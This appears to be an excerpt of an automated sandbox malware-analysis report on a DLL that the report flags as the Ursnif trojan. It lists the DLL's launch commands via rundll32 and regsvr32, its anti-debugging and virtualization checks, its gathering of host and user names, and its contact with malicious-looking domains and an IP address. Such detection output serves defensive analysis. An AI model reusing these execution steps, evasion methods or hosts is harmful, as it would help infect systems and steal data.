                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5EF2C13C-4C8E-11EC-90E5-ECF4BB2D2496}.datJump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DFCCE32108ABF6B532.TMPJump to behavior
                      Source: classification engineClassification label: mal96.troj.evad.winDLL@17/114@45/3
                      Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00A8A1D4 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00A8A1D4
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\WTXuYxax6d.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
                      Source: WTXuYxax6d.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: WTXuYxax6d.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: WTXuYxax6d.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: WTXuYxax6d.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: WTXuYxax6d.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: WTXuYxax6d.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: WTXuYxax6d.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: WTXuYxax6d.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: WTXuYxax6d.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: WTXuYxax6d.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: WTXuYxax6d.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: WTXuYxax6d.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: WTXuYxax6d.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D78C0 push ecx; ret 0_2_736D78D3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00A8ABD0 push ecx; ret 0_2_00A8ABD9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00A8AF03 push ecx; ret 0_2_00A8AF13
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D78C0 push ecx; ret 2_2_736D78D3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A621A3 push ecx; ret 3_2_00A621B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A62150 push ecx; ret 3_2_00A62159
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A9ABD0 push ecx; ret 3_2_00A9ABD9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A9AF03 push ecx; ret 3_2_00A9AF13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02B821A3 push ecx; ret 5_2_02B821B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02B82150 push ecx; ret 5_2_02B82159
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BBABD0 push ecx; ret 5_2_02BBABD9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BBAF03 push ecx; ret 5_2_02BBAF13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A616C3 LoadLibraryA,GetProcAddress,3_2_00A616C3
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\WTXuYxax6d.dll
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.13842205011

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000002.00000003.620315557.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.884237946.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613835753.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612905346.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612880805.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612995967.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.880807454.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701819091.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.613174085.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.664565353.000000000513D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620214841.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.702016309.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613794834.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.642767964.000000000523B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.881549232.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620265495.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.635568127.0000000004E5B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620243933.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613948347.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620142786.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701985470.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.679769381.0000000004C5F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.702307918.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.657340118.0000000004D5D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620475830.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701915707.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613862631.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613818747.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.884432102.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613737711.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620285363.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.613014620.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612932234.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.658506384.000000000507D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612953290.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620302187.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612852123.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701957231.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.746687116.000000000186D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.768852725.000000000176F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.686987362.000000000503F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701777888.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.702038882.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.724522780.000000000196B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.636697378.000000000517B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.681026277.0000000004F7F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620184852.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613707607.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701868957.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612982412.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613851431.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613762692.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6980, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7012, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7052, type: MEMORYSTR
                      Source: Yara matchFile source: 5.2.rundll32.exe.2b80000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.920000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a60000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.a80000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.4ea94a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.9f0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2bb0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.12994a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.b40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a60000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.4ea94a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.9e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49a94a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2b80000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.990000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a50000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.870000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.d80000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.9f0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4d494a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4d494a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49a94a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.880000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.12994a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2b70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a90000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.920000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.883888908.0000000004D49000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.879831053.0000000000A50000.00000004.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.879772547.0000000000A40000.00000004.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.884087885.00000000049A9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.881330354.0000000004EA9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.879852238.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.880442482.0000000001299000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.878853677.0000000000870000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.879036722.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.878927946.0000000000880000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.879010768.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.879009895.0000000000920000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.880994352.0000000002B70000.00000004.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.878979369.0000000000990000.00000004.00000001.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4264Thread sleep time: -1773297476s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5884Thread sleep time: -210000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736DA676 FindFirstFileExW,0_2_736DA676
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736DA676 FindFirstFileExW,2_2_736DA676
                      Source: regsvr32.exe, 00000002.00000003.778713654.0000000002F76000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: regsvr32.exe, 00000002.00000003.845301317.0000000002F4A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWp{
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D9FB8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_736D9FB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A616C3 LoadLibraryA,GetProcAddress,3_2_00A616C3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736DBD8C GetProcessHeap,0_2_736DBD8C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D6AD0 mov eax, dword ptr fs:[00000030h]0_2_736D6AD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D6AD0 mov eax, dword ptr fs:[00000030h]0_2_736D6AD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D9F85 mov eax, dword ptr fs:[00000030h]0_2_736D9F85
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D6620 mov eax, dword ptr fs:[00000030h]0_2_736D6620
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D8DCB mov eax, dword ptr fs:[00000030h]0_2_736D8DCB
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D6AD0 mov eax, dword ptr fs:[00000030h]2_2_736D6AD0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D6AD0 mov eax, dword ptr fs:[00000030h]2_2_736D6AD0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D9F85 mov eax, dword ptr fs:[00000030h]2_2_736D9F85
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D6620 mov eax, dword ptr fs:[00000030h]2_2_736D6620
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D8DCB mov eax, dword ptr fs:[00000030h]2_2_736D8DCB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D9FB8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_736D9FB8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D7214 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_736D7214
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D76ED IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_736D76ED
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D9FB8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_736D9FB8
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D7214 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_736D7214
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D76ED IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_736D76ED

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: avolebukoneh.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.9.20.245 187Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: technoshoper.com
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\WTXuYxax6d.dll",#1Jump to behavior
                      Source: loaddll32.exe, 00000000.00000002.880973456.0000000001D00000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.881091593.0000000003530000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.881548512.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.881470565.0000000003290000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.880973456.0000000001D00000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.881091593.0000000003530000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.881548512.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.881470565.0000000003290000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.880973456.0000000001D00000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.881091593.0000000003530000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.881548512.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.881470565.0000000003290000.00000002.00020000.sdmpBinary or memory string: &Program Manager
                      Source: loaddll32.exe, 00000000.00000002.880973456.0000000001D00000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.881091593.0000000003530000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.881548512.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.881470565.0000000003290000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D78D7 cpuid 0_2_736D78D7
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D7336 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_736D7336
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00A87648 GetVersion,GetLastError,0_2_00A87648
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00A89DE1 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_00A89DE1

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000002.00000003.620315557.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.884237946.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613835753.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612905346.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612880805.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612995967.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.880807454.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701819091.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.613174085.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.664565353.000000000513D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620214841.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.702016309.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613794834.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.642767964.000000000523B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.881549232.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620265495.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.635568127.0000000004E5B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620243933.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613948347.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620142786.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701985470.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.679769381.0000000004C5F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.702307918.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.657340118.0000000004D5D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620475830.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701915707.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613862631.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613818747.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.884432102.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613737711.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620285363.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.613014620.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612932234.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.658506384.000000000507D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612953290.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620302187.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612852123.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701957231.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.746687116.000000000186D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.768852725.000000000176F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.686987362.000000000503F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701777888.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.702038882.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.724522780.000000000196B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.636697378.000000000517B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.681026277.0000000004F7F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620184852.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613707607.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701868957.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612982412.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613851431.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613762692.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6980, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7012, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7052, type: MEMORYSTR
                      Source: Yara matchFile source: 5.2.rundll32.exe.2b80000.2.raw.unpack, type: UNPACKEDPE
